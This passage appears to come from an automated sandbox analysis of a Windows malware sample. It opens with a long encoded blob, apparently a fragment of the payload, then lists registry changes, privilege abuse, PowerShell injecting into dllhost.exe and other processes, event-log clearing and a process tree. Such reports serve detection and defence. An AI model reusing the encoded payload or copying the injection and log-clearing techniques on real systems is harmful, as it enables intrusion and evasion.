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" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxarfvgzxkmqjh\DeviceId = "<Data><User username=\"02XXARFVGZXKMQJH\"><HardwareInfo BoundTime=\"1735376284\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxarfvgzxkmqjh\DeviceId = "<Data><User username=\"02XXARFVGZXKMQJH\"><HardwareInfo BoundTime=\"1735376283\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxarfvgzxkmqjh\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={27D6FD15-D07D-4FBB-BD69-05A5882CAEDD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02ygmmrhejyrygsu\AppIdList svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\ValidDeviceId = "02xxarfvgzxkmqjh" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1735376356" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b00000000020000000000106600000001000020000000020a0230496828eb762c378f925098a66bff3f9e2dff5ea77789101ca628fc28000000000e80000000020000200000008ad4ad6ec84f5606f50ecb797f4a8a77fd30a61be83238516bb731085c87bd8ab0030000e88dcf20c4c3c668bd45f7a3026e61c04a23315cd15271d089d63a102c8ab6d67bf2992ea969c370edbccdafb325bbe2e49d05a94c0b58a0235c466625c7afbea4638375ec5c6340ca0531aa7f148f815d45b6d38bde7e3891b008f60b32a1d08e99bbd2f6cf82b739b999e29256cdc84a25bfe5ab618ed44331b24784f86773aab96484d5cf1727bee2850a66b1d81d0f79be212c63962d6880dcd10286f39bc4f32a3681d7498880dde27d7708f7d6a0f95d2e7d5466917193ea1aec4914d873b8bd644e22f7b7aed0e6cbb409f9d58be33295140b23f2272f80e8140b9230085b6f74695c037fbd3e4eef9ed591dd58234aa44865fa506e7f3aee54211b34cc71661f0e95512b94fe7af9f81de2065777c3319e440cdfaf0926748c3325fe3cd21acb330cc3d20ddee13897d111e21703e90237fb1aa534816645543fd02cf554ed6f79635e95eb4455ba1d6318f94abea2e7ae959d121612fe0cb0402d11e786643d74196ccb59e4b9eedd7f751b5157b035333be9abaa5637b6d9f0d3dc08dce5ed317daa10ec7354cfb8242864fbce5c9fcbdc5e0594ee1cd4c8723da8f202b11ef0b21c6a1a8a5059f33867b9cf376796628e2f3ff74dbeb525786fd6ce646a8bde8c2cbaa02315bb1b3c3844b56a75388fee6c10624d43920d02c13887dae19cecb63d2d5f75c81c146ddbd1cc5a5f5bce057482060ad84d560169a1d5917ea9929b0b2a202d070c5a728bc4fbe9297fe7415400635da1226b3d6027ef32ac884f89e2b70f7d69b1544eb7484c5b862e328d9614c13b7c402beb1017833c33d911db5cc81b3021341a887df4df60eff77b05abfa56e6a6f7334d4b145db6028855ede4add859be0ce8a059f459da8b697fe8b86de4c546094eb04471a8718d423e62be57f0380e1903bc185ad8424717a6dea42067a88e6e46b0756debdf4c9d35a89fe5f2fa3b9b4dfcfbd6066a72fbb5baf612af87d3e85f2d18452fbf596f3fb6c53d252c50e29f763173a3a45d81fa6f7d14c747a4e14b284c88e6276778133b28299d94960af327a88d128f7b42693bf79c88ae33e4fa0f0ef16763905323cc977aae329079d377145a1275f9d544030983d64e4a7355c7ed0a35ee6ba323bdf7242e3c08cb0b44416c8e3565fa1a65727cdfbc16d0b0fcf2c7b06c8426c5b095fd67f0c2580fc2381a2680f5ef4aa720d92793d495a2259e423e80875b5d2a672429378c5f18f76b16acc8e94cb31232fc90d96d2f202447b23e2b70c30c6824435b7ecd4cb3a2a0baf496f4ac77111ee758c697c5d8c86c3fb88dad876ed4c9694ee83ace658fc957400000001977d47dc7a43186ccf07375de808a8882ca5584495cad1315504908f3c9ce358fceef6f8dd3e7012aee1f68eefddb549aa4a1ab3c2d67f5ba722bacdfbb8913 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1548 powershell.exe 1548 powershell.exe 1548 powershell.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4864 powershell.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4864 powershell.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4864 powershell.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4864 powershell.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4448 dllhost.exe 4864 powershell.exe 4448 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 4448 dllhost.exe Token: SeCreateGlobalPrivilege 3612 dwm.exe Token: SeChangeNotifyPrivilege 3612 dwm.exe Token: 33 3612 dwm.exe Token: SeIncBasePriorityPrivilege 3612 dwm.exe Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeDebugPrivilege 4864 powershell.exe Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeDebugPrivilege 1440 dllhost.exe Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 4944 svchost.exe Token: SeCreatePagefilePrivilege 4944 svchost.exe Token: SeShutdownPrivilege 4944 svchost.exe Token: SeCreatePagefilePrivilege 4944 svchost.exe Token: SeShutdownPrivilege 4944 svchost.exe Token: SeCreatePagefilePrivilege 4944 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2008 svchost.exe Token: SeIncreaseQuotaPrivilege 2008 svchost.exe Token: SeSecurityPrivilege 2008 svchost.exe Token: SeTakeOwnershipPrivilege 2008 svchost.exe Token: SeLoadDriverPrivilege 2008 svchost.exe Token: SeBackupPrivilege 2008 svchost.exe Token: SeRestorePrivilege 2008 svchost.exe Token: SeShutdownPrivilege 2008 svchost.exe Token: SeSystemEnvironmentPrivilege 2008 svchost.exe Token: SeManageVolumePrivilege 2008 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2008 svchost.exe Token: SeIncreaseQuotaPrivilege 2008 svchost.exe Token: SeSecurityPrivilege 2008 svchost.exe Token: SeTakeOwnershipPrivilege 2008 svchost.exe Token: SeLoadDriverPrivilege 2008 svchost.exe Token: SeSystemtimePrivilege 2008 svchost.exe Token: SeBackupPrivilege 2008 svchost.exe Token: SeRestorePrivilege 2008 svchost.exe Token: SeShutdownPrivilege 2008 svchost.exe Token: SeSystemEnvironmentPrivilege 2008 svchost.exe Token: SeUndockPrivilege 2008 svchost.exe Token: SeManageVolumePrivilege 2008 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2008 svchost.exe Token: SeIncreaseQuotaPrivilege 2008 svchost.exe Token: SeSecurityPrivilege 2008 svchost.exe Token: SeTakeOwnershipPrivilege 2008 svchost.exe Token: SeLoadDriverPrivilege 2008 svchost.exe Token: SeSystemtimePrivilege 2008 svchost.exe Token: SeBackupPrivilege 2008 svchost.exe Token: SeRestorePrivilege 2008 svchost.exe Token: SeShutdownPrivilege 2008 svchost.exe Token: SeSystemEnvironmentPrivilege 2008 svchost.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
pid Process 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE 3440 Explorer.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 3440 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4864 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3872 wrote to memory of 4004 3872 cmd.exe 83 PID 3872 wrote to memory of 4004 3872 cmd.exe 83 PID 3872 wrote to memory of 2956 3872 cmd.exe 84 PID 3872 wrote to memory of 2956 3872 cmd.exe 84 PID 3872 wrote to memory of 924 3872 cmd.exe 85 PID 3872 wrote to memory of 924 3872 cmd.exe 85 PID 3872 wrote to memory of 1548 3872 cmd.exe 86 PID 3872 wrote to memory of 1548 3872 cmd.exe 86 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 1548 wrote to memory of 4448 1548 powershell.exe 87 PID 4448 wrote to memory of 612 4448 dllhost.exe 5 PID 4448 wrote to memory of 672 4448 dllhost.exe 7 PID 4448 wrote to memory of 960 4448 dllhost.exe 12 PID 4448 wrote to memory of 372 4448 dllhost.exe 13 PID 672 wrote to memory of 2768 672 lsass.exe 48 PID 4448 wrote to memory of 752 4448 dllhost.exe 14 PID 4448 wrote to memory of 1004 4448 dllhost.exe 15 PID 4448 wrote to memory of 1092 4448 dllhost.exe 17 PID 672 wrote to memory of 2768 672 lsass.exe 48 PID 4448 wrote to memory of 1116 4448 dllhost.exe 18 PID 4448 wrote to memory of 1144 4448 dllhost.exe 19 PID 672 wrote to memory of 2768 672 lsass.exe 48 PID 4448 wrote to memory of 1168 4448 dllhost.exe 20 PID 4448 wrote to memory of 1276 4448 dllhost.exe 21 PID 4448 wrote to memory of 1340 4448 dllhost.exe 22 PID 4448 wrote to memory of 1380 4448 dllhost.exe 23 PID 4448 wrote to memory of 1416 4448 dllhost.exe 24 PID 4448 wrote to memory of 1556 4448 dllhost.exe 25 PID 4448 wrote to memory of 1564 4448 dllhost.exe 26 PID 4448 wrote to memory of 1584 4448 dllhost.exe 27 PID 4448 wrote to memory of 1632 4448 dllhost.exe 28 PID 4448 wrote to memory of 1740 4448 dllhost.exe 29 PID 4448 wrote to memory of 1760 4448 dllhost.exe 30 PID 4448 wrote to memory of 1836 4448 dllhost.exe 31 PID 4448 wrote to memory of 1936 4448 dllhost.exe 32 PID 4448 wrote to memory of 2008 4448 dllhost.exe 33 PID 4448 wrote to memory of 1040 4448 dllhost.exe 34 PID 4448 wrote to memory of 1228 4448 dllhost.exe 35 PID 1548 wrote to memory of 4444 1548 powershell.exe 91 PID 1548 wrote to memory of 4444 1548 powershell.exe 91 PID 672 wrote to memory of 2768 672 lsass.exe 48 PID 4448 wrote to memory of 1660 4448 dllhost.exe 36 PID 672 wrote to memory of 2768 672 lsass.exe 48 PID 4448 wrote to memory of 1776 4448 dllhost.exe 37 PID 4448 wrote to memory of 2104 4448 dllhost.exe 38 PID 4448 wrote to memory of 2188 4448 dllhost.exe 40 PID 4448 wrote to memory of 2272 4448 dllhost.exe 41 PID 4448 wrote to memory of 2480 4448 dllhost.exe 42 PID 4448 wrote to memory of 2488 4448 dllhost.exe 43 PID 4448 wrote to memory of 2648 4448 dllhost.exe 44 PID 4448 wrote to memory of 2688 4448 dllhost.exe 45 PID 4448 wrote to memory of 2704 4448 dllhost.exe 46 PID 4448 wrote to memory of 2748 4448 dllhost.exe 47 PID 4448 wrote to memory of 2768 4448 dllhost.exe 48 PID 4448 wrote to memory of 2800 4448 dllhost.exe 49 PID 4448 wrote to memory of 2808 4448 dllhost.exe 50 PID 4448 wrote to memory of 2912 4448 dllhost.exe 51 PID 4448 wrote to memory of 3028 4448 dllhost.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:372
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{46156f6f-c045-4f9c-8e22-ef48357bf985}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4448
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ce5d90dc-d729-408e-9ce6-c3e82976cfa4}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1168 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2912
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1556
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2648
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1228
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1776
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2480
-
